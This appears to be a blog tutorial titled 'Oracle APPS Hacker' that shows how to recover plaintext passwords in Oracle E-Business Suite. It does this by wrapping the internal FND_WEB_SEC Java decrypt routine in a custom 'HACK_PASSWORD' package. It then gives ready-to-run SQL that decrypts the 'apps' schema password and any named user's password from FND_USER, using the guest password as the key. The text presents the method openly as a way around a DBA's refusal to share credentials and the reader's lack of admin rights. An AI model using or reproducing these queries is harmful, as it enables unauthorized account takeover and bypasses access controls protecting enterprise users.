Oracle APPS Hacker – Crack any Application User
When you are Working in Oracle Apps
Environment, It’s a very challenging job because many times you do not have the
passwords to logon to some user who is complaining and DBA does not share any
passwords with you and nor you have the sysadmin or Application developer
responsibility. Oracle Apps Schema is the centralized schema to hold all the
objects with all grants. Passwords in Oracle Apps schema are in an encrypted
format. Oracle Apps use FND_WEB_SEC
package to decrypt these passwords for validating against the user. The password
DECRYPT function is a local function and can’t be called outside the
FND_WEB_SEC package.
The Apps User’s Password and Oracle
Apps Passwords are encrypted and stored in these tables…
FND_USER
FND_ORACLE_USERID
/*=====Decrypt function available in the FND_WEB_SEC=====*/
function decrypt(key in varchar2, value in
varchar2) return varchar2 as language java name
'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String)
return java.lang.String';
/*=====Decrypt function available in the FND_WEB_SEC=====*/
/* CREATE
PACKAGE HACK_PASSWORD */
CREATE
OR REPLACE PACKAGE HACK_PASSWORD AS FUNCTION decrypt ( KEY IN VARCHAR2 ,VALUE
IN VARCHAR2 ) RETURN VARCHAR2; END HACK_PASSWORD;
/* CREATE
PACKAGE BODY OF HACK_PASSWORD */
CREATE
OR REPLACE PACKAGE BODY HACK_PASSWORD AS FUNCTION decrypt ( KEY IN VARCHAR2
,VALUE IN VARCHAR2 ) RETURN VARCHAR2 AS LANGUAGE JAVA NAME
'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String)
return java.lang.String'; END HACK_PASSWORD;
Query to hack password for “apps”
user
SELECT
(SELECT HACK_PASSWORD.decrypt (UPPER
((SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) FROM DUAL)),usertable.encrypted_foundation_password)
FROM DUAL) AS My_APPS_Password
FROM fnd_user usertable
WHERE
usertable.user_name LIKE UPPER
((SELECT SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'), '/')- 1)FROM DUAL))
Query to hack password for “Any Application User” user
SELECT usertable.user_name , (SELECT
HACK_PASSWORD.decrypt (UPPER ((SELECT (SELECT HACK_PASSWORD.decrypt (UPPER
((SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD'))
FROM DUAL)),
usertable.encrypted_foundation_password)
FROM DUAL) AS My_APPS_Password
FROM fnd_user usertable
WHERE
usertable.user_name LIKE UPPER
((SELECT SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD') ,1 , INSTR
(fnd_profile.VALUE ('GUEST_USER_PWD'), '/') - 1 )
FROM DUAL))))
,usertable.encrypted_user_password) FROM DUAL) AS encrypted_user_password FROM
fnd_user usertable
WHERE usertable.user_name LIKE UPPER
('&MY_USERNAME')